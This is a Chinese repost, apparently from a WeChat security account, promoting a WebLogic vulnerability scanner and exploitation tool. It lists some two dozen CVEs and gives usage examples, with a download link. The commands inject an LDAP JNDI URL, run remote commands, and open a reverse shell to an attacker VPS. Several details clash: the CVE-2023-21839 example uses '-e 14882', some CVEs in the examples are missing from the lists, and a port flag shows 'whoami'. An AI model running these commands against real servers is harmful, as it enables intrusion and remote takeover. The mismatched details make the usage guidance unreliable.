项目地址:https://github.com/qi4L/WeblogicScan.go
目前可检测的POC
CVE-2014-4210
CVE-2016-0638
CVE-2016-3510
CVE-2017-10271
CVE-2017-3248
CVE-2017-3506
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
cve-2018-3191
cve-2018-3245
cve-2018-3252
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890
cve-2020-2551
cve-2020-2555
cve-2020-2883
cve-2020-14750
cve-2020-14882
cve-2020-14883
cve-2023-21839
目前可利用的EXP
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2628
CVE-2018-2893
CVE-2020-14882
cve-2020-2555
cve-2020-2883
cve-2023-21839
使用示例
-u url
you target, example: 127.0.0.1
-p Port
you target Port, example: "whoami"
-e EXP
Exploitation alone, example: ""
-l ldap
ldap server, example: "ldap://127.0.0.1/#eval"
-ri rip
reverse ip
-rp rport
reverse port
-
POC一键检测
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -l ldap://127.0.0.1/#eval
-
EXP单个利用,指定EXP末尾数字即可
//CVE-2023-21839
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -l ldap://127.0.0.1/#eval -e 14882
//cve-2020-2883
//cve-2020-2555
//cve-2016-0638
//cve-2016-0315
//cve-2017-3248
//cve-2018-2628
//cve-2018-2893
//cve-2020-14882
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -c calc.exe -e 2883
//cve-2020-2889
WeblogicScanner.exe -u 127.0.0.1 -p 7001 -c -ri <vps_ip> -rp <VPS_PORT> -e 2889
免责声明
该工具仅用于安全自查检测,由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。
工具下载
「Weblogic...ster.zip」,
链接:https://pan.quark.cn/s/0736e132b240
原文始发于微信公众号(菜鸟学信安):HW必备|WeblogicScan一键检测工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论